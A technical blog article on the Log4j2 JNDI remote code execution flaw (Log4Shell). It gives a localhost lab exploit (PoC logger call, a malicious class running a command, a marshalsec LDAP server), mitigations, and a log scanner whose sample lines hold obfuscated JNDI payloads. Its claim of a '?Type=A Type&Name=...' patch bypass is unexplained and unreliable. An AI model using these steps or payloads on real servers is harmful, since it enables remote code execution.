
Log4j2 Remote Code Execution Vulnerability: Exploitation Steps and Mitigation

This article explains the Log4j2 remote code execution vulnerability, its affected versions, how to set up a test environment, detailed exploit code examples, and recommended mitigation measures including upgrades and JVM configuration changes.

Top Architect

Apache Log4j2 is a widely used open‑source Java logging framework that suffered a critical remote code execution vulnerability due to unsafe recursive lookups, allowing unauthenticated attackers to execute arbitrary code on vulnerable servers.

Vulnerability Overview: The flaw affects Log4j2 versions up to 2.15.0‑rc1 and is triggered by sending specially crafted input that Log4j2 evaluates as a JNDI lookup, such as ${jndi:ldap://...}.

Impact Scope: All applications using Log4j2 2.x ≤ 2.15.0‑rc1 are vulnerable.

Environment Setup: Create a new Maven project and add the following dependency:

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

Build the project and include the Log4j2 library.

Exploitation Steps:

1. Use a PoC Java class to trigger the vulnerability:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2. Compile a malicious class Exploit.class that runs a command (e.g., calc) when loaded:

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile with javac exp.java.

3. Start a malicious LDAP server using marshalsec-0.0.3-SNAPSHOT-all.jar:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

4. Run the PoC program; the vulnerable Log4j2 instance will fetch the malicious class from the LDAP server and execute the embedded command.

Additional tricks such as crafted ?Type=A Type&Name=1100110&Char=! payloads can bypass early patches (rc1). The official fix is available in Log4j2 2.15.0‑rc2 and later.

Mitigation:

Upgrade to the latest Log4j2 version (e.g., 2.15.0‑rc2 or newer).

Add the JVM option -Dlog4j2.formatMsgNoLookups=true.

Place a log4j2.component.properties file on the classpath containing log4j2.formatMsgNoLookups=true.

Use JDK 11.0.1+, 8u191+, 7u201+, or 6u211+.

Deploy third‑party web‑application firewalls for additional protection.
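As an added defensive example (not code from the original article), the following Python script scans web-server log lines for the ${jndi:...} lookup described above. Because Log4j2 resolves nested lookups inside-out, the scanner first collapses lower/upper and default-value (:-) lookups and URL-encoding so that a disguised payload normalizes to the plain form before matching. The log lines, hosts (RFC 5737 documentation range) and function names are all constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original article); 203.0.113.0/24
# is the RFC 5737 documentation range, so no real host is referenced.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/a} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${env:HOME} ${date:yyyy}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D HTTP/1.1" 200 "-" "-"',
]

# Innermost ${...} lookup: its body contains no nested '${' and no '}'.
INNER = re.compile(r'\$\{([^${}]*)\}')
# A resolved JNDI lookup, capturing the URL scheme and host[:port].
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)', re.IGNORECASE)

def _resolve(m):
    """Evaluate the lookups Log4j2 itself would expand before reaching 'jndi'."""
    inner = m.group(1)
    if ':-' in inner:                      # ${key:-default} and ${::-x} yield the default text
        return inner.split(':-', 1)[1]
    name, _, arg = inner.partition(':')
    if name.lower() == 'lower':
        return arg.lower()
    if name.lower() == 'upper':
        return arg.upper()
    return m.group(0)                      # jndi/env/date/...: keep intact for the detector

def normalize_lookups(text, max_passes=20):
    """URL-decode, then collapse nested lookups inside-out until nothing changes."""
    text = unquote(text)
    for _ in range(max_passes):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def scan_line(line):
    """Return (normalized_line, [(scheme, host_port), ...]) for one log line."""
    norm = normalize_lookups(line)
    return norm, [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(norm)]

def scan_log(lines):
    """Return [(line_number, hits)] for every line that carries a JNDI lookup."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := scan_line(line)[1])]
```

Feed real access or application logs to scan_log; the scheme and host in each hit give the callback server to block and hunt for across the rest of the estate.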

For reference, see the official GitHub comparison link and release notes for the patched versions.

Tags: java, Security, vulnerability, Log4j2, exploit, CVE-2021-44228
Written by Top Architect

Top Architect focuses on sharing practical architecture knowledge, covering enterprise, system, website, large‑scale distributed, and high‑availability architectures, plus architecture adjustments using internet technologies. We welcome idea‑driven, sharing‑oriented architects to exchange and learn together.
